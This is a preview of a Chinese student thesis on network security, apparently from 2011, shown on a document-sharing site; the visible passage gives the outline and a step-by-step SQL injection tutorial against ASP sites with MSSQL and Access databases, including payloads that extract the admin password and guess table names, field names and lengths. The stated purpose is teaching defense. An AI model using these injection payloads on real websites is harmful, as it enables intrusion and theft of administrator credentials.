计算机网络安全与维护论文

整理文档很辛苦,赏杯茶钱您下走!

免费阅读已结束,点击下载阅读编辑剩下 ...

阅读已结束,您可以下载文档离线阅读编辑

资源描述

1计算机网络安全与维护专业计算机信息管理班级数码嵌入式3-3班学生杨晓东指导教师魏西航西安理工大学二0一一年五月2摘要:网络安全技术随着黑客技术的发展而产生,我们在研究网络安全的时候首先应该研究黑客常用的入侵手段和攻击技术。因此本论文主要通过对黑客技术的研究来讲解网络安全防范,主要以揭露了黑客攻击的原理、攻击手段来推出相应该的安全防范措施。通过许多的攻击实例以及防范实例让人们掌握网络安全的基本防范技术、了解黑客攻击的原理和方法以及带来的危害,从而达到提高网络安全防范的意识和增强网络安全防范的能力。关键词:黑客;黑客技术;网络安全3目录第一章概述1.1、本课题的来源1.2、本论文的目的、内容及作者主要贡献第二章脚本漏洞2.1脚本漏洞形成的原因2.2脚本漏洞之黑客工具分析2.3脚本漏洞带来的危害2.4Asp脚本漏洞带来的危害2.5Php注入原理2.6Php注入实例2.7Php注入防范2.8其他脚本注入防范第三章网站旁注3.1网站旁注第四章缓冲区溢出4.1冲区溢出原理4.2出攻击实例第五章网络嗅探5.1网络嗅探原理5.2网络嗅探实例第六章密码破解6.1密码破解第七章社会工程学7.1Aminintrator致命的错误第八章个人PC主机安全之木马篇7.1、木马的原理7.2、木马软件的介绍及简单的使用47.3、网页木马第八章个人PC主机安全之病毒8.1病毒第九章个人PC主机安全之漏洞9.1漏洞致谢参考文献第一章概述1、本题课题来源5计算机网络是现代通信技术与计算机技术相结合的产物。所谓计算机网络,就是把分布在不同地理区域的计算机与专门的外部设备用通信线路互连成一个规模大、功能强的网络系统,从而使众多的计算机可以方便地互相传递信息,共享硬件、软件、数据信息等资源。从世界上第一台计算机诞生到今天互联网的日益普及,计算机的发展速度可谓突飞猛进,从而也把人类文明带入数码时代。计算机网络的出现,使人们在获取和传递信息时,又多了一种选择,而且是一种能够提供空前“自由化”的选择,它使信息的传播速度、质量与范围在时间和空间上有了质的飞跃,从而使人们的许多梦想变成了现实。但是,辩证唯物主义认为,任何事物都是矛盾对立的统一体,尤其是对于正在发展中的新事物来说,更是如此。计算机网络也不例外。人们在享受着网络传输带给我们便利的同时,也对日露端倪的网络负面影响愈发担忧。开放的信息系统必然存在众多潜在的安全隐患,黑客和反黑客、破坏和反破坏的斗争仍将继续。在这样的斗争中,安全技术作为一个独特的领域越来越受到全球网络建设者的关注。随着网上的在线交易、互联星空冲值、网络游戏的发展、电子商务的发展,网络安全越来越关系着广大用户的切身利益。2、本题客源的目的目前网络在世界经济社会中占据着越来越重要的地位,已经不只为了信息和数据的安全,甚至已经渗透到国家的政治、经济、社会、和军事之中。网络黑客,始终给人们蒙上了一层神秘的面纱,其实他们只不过是一群计算机技术的狂热爱好者,仅仅是利用了自己的技术技巧以及系统的漏洞和用户的弱点。本文主要批露目前流行的黑客攻击技术、揭露黑客技术的原理、介绍针对攻击的安全防范方法,用来提高大家的网络安全防范能力和安全防范意识。3、本题内容主要框架主要通过对黑客技术的介绍来让大家了解黑客攻击的方式。攻与防是分不开的,我们只有在了解其攻击方式和原理后,才能真正更好的防御。本文主要分为两个大体内容:网站服务器安全和个人pc机安全,其中网站服务器安全主要介绍各种网站服务器的入侵方式和防范方法:如脚本漏洞入侵、网络旁注、远程溢出、网络嗅探、社会工程学、ddos拒绝服务攻击等个人pc机安全:主要讲叙黑客入侵个人机常用的方法及防范,如木马技术、远程溢出、弱口令扫描、ipc管道、以及黑客到底想用我们的个人机干什么。具体内容我将以图文(一)并茂的方式展现出来,先看一下下面的“服务器安全之黑客攻击手段”框架:61图解一2PoweredByGisun洞形成的原因随着网络经济的复舒,开始越来越多的网站涌现出来,随着脚本漏洞的挖掘,黑客也越来越猖狂,并且越来越低龄化和傻瓜化。“你只要会用一个工具就可以黑站”,这就是脚本漏洞利的特点。这些漏洞的主要成因是编程程序员的素质,往往在编写asp或php等程序时候对字符的过滤不严密,对注入漏洞不了解,或者某个参数忘记检查导致的。由于编写网页程序这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQLInjection,即SQL注入。相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。我们看一个例子:在本机建一个基于iis的asp程序=3,将这个网址提交到服务器后,服务器将进行类似Select*from表名where字段=&ID的查询(ID7即客户端提交的参数,本例即是3),再将查询结果返回给客户端,如果这里客户端故意提交这么一个网址:=3anduser0,这时,服务器运行Select*from表名where字段=444anduser0这样的查询,当然,这个语句是运行不下去的,肯定出错,错误信息如下:·错误类型:MicrosoftOLEDBProviderforODBCDrivers(0x80040E07)[Microsoft][ODBCSQLServerDriver][SQLServer]将nvarchar值'test'转换为数据类型为int的列时发生语法错误。/test/show.asp,第34行从这个出错信息中,我们可以获得以下信息:该站使用MSSQL数据库,用ODBC连接,连接帐号名为:test。所谓SQL注入,就是利用程序员对用户输入数据的合法性检测不严或不检测的特点,故意从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取想得到的资料。通常别有用心者的目标是获取网站管理员的帐号和密码。比如当知道网站管理员帐号存在表login中,管理员帐号名为admin想知道admin的密码,这里接着从客户端提交这样一个网址:=4and(Selectpasswordfromloginwhereuser_name='admin')0,返回的出错信息如下:·错误类型:MicrosoftOLEDBProviderforODBCDrivers(0x80040E07)[Microsoft][ODBCSQLServerDriver][SQLServer]将varchar值'admin888'转换为数据类型为int的列时发生语法错误。/test/show.asp,第34行现在出来了“admin888”就是管理员的密码!得到这个密码,这时您就可以用这个帐号和密码接管人家的网站了!当然我们并不知道帐号就在表login中,而且也不知道管理员名为admin,但这些不容难办到,我们可以写个工具进行猜解,速度很快就可以找到你想要的东西了。前面是有关mssql数据库的注入基础,我们再看一看acce数据库的注入基础:首先进行浏览器的设置,以保证手工注入时能返回出错信息。其操作步骤为:右键单击浏览器图标,选择“属性”,在弹出来的对话框中选择“高级”选项卡,接着去掉“显示友好的HTTP错误信息”前面的钩,最后点击“应用”按钮即可。对于sql注入得先找到注入点,注入点的判断方法为:通常打开一个类似=xx的url后加个单引号,变成=xx’如果出现错误提示,则说明可能存在注入漏洞,再输入=xxand1=1如果存在SQL注入漏洞,就可以查询数据库,1=1是一个恒等式可以忽略,因此会返回一个正常的页面,此页面和=xx一样,这时入侵者便判断此站有希望被注入。如果返回的是一些错误信息,那么一些初级的入侵者可能就会放弃这个站点。入侵者进一步向浏览器提交如下url:=xxand1=2,1=2为一个恒不等式,如果该站点支持数据库查询,则大概会返回如下所示的信息:Microsoftvbscript编译器错误错误码率‘800a03f6’缺少’End’/iishelp/common/500-100.asp,行242ADODB.Field错误‘800a0bcd’一般出现以上信息就可以确定存在sql注入漏洞了。下面我们来看一下sql注入的过程分析:如:打开:=17在其后面加'为=17'出错!显示为:“数据库出错”。那么接下来我们便进行如下操作:1猜管理员帐号表。2猜相应表中的用户的字段名以及密码的字段名。3猜出用户名的长度和密码的长度4猜出用户和密码5找到管理页面进入管理猜管理员的表:=17and1=(selectmin(id)fromadmin)'//min(id)返回表中ID最小值8返回文章证明,有一个admin的表;如果没有返回文章,证明出错不存在admin这个表。猜用户的字段名:=17and1=(selectmin(id)fromadminwhereuser='aaa')返回错误信息,表示没有user这个用户段名再来!~~~=17and1=(selectmin(id)fromadminwhereusername='aaa')没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在username个字段,只是用户名不是aaa猜密码的字段名:=17and1=(selectmin(id)fromadminwherepasswd='aaa')返回错误信息表示没有passwd这个密码字段名。再来:=17and1=(selectmin(id)fromadminwherepassword=aaa')没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在password这个字段,只是密码不是aaa猜用户字段名长度:=17and1=(selectmin(id)fromadminwherelen(username)5)正确=17and1=(selectmin(id)fromadminwherelen(username)10)正确用户名长度大于5小于10=17and1=(selectmin(id)fromadminwherelen(username)=7)呵```用户名长度为7位猜密码长度:=17and1=(selectmin(id)fromadminwherelen(password)5)正确

1 / 60
下载文档,编辑使用

©2015-2020 m.777doc.com 三七文档.

备案号:鲁ICP备2024069028号-1 客服联系 QQ:2149211541

×
保存成功